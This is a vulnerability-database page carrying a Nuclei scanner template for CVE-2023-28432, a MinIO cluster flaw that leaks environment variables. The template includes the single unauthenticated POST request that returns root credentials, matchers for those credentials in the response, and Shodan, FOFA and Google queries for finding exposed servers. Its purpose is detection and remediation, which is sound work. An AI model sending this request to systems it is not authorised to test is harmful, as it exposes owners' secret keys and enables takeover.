Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-28432
HistoryMar 23, 2023 - 3:45 p.m.

MinIO Cluster Deployment - Information Disclosure

2023-03-2315:45:48
ProjectDiscovery
github.com
17
cve
cve2023
minio
console
exposure
kev
information
authorization
vulnerability
cluster

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

AI Score

Confidence

High

0.885 High

EPSS

Percentile

98.7%

MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
id: CVE-2023-28432

info:
  name: MinIO Cluster Deployment - Information Disclosure
  author: Mr-xn
  severity: high
  description: |
    MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
  impact: |
    An attacker can gain unauthorized access to sensitive information stored in the MinIO cluster.
  remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
    - https://github.com/minio/minio/pull/16853/files
    - https://github.com/golang/vulndb/issues/1667
    - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28432
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-28432
    cwe-id: CWE-200,NVD-CWE-noinfo
    epss-score: 0.93873
    epss-percentile: 0.9913
    cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: minio
    product: minio
    shodan-query:
      - title:"Minio Console"
      - http.title:"minio browser"
      - cpe:"cpe:2.3:a:minio:minio"
      - http.title:"minio console"
    fofa-query:
      - app="Minio"
      - app="minio"
      - title="minio browser"
      - title="minio console"
    google-query:
      - intitle:"minio browser"
      - intitle:"minio console"
  tags: cve,cve2023,minio,console,exposure,kev

http:
  - raw:
      - |+
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"MINIO_ROOT_PASSWORD":'
          - '"MINIO_ROOT_USER":'
          - '"MinioEnv":'
        condition: or

      - type: word
        part: header
        words:
          - 'text/plain'

      - type: status
        status:
          - 200
# digest: 490a0046304402204918fcacd2dd44975dd3bc7b60d45dabff1ae1ab08929be54428b57a9a5d953c022070c97f7fed976c184f8c5b4f10b28dd36fb1acdbe6eb625b45b272ce39401e15:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

AI Score

Confidence

High

0.885 High

EPSS

Percentile

98.7%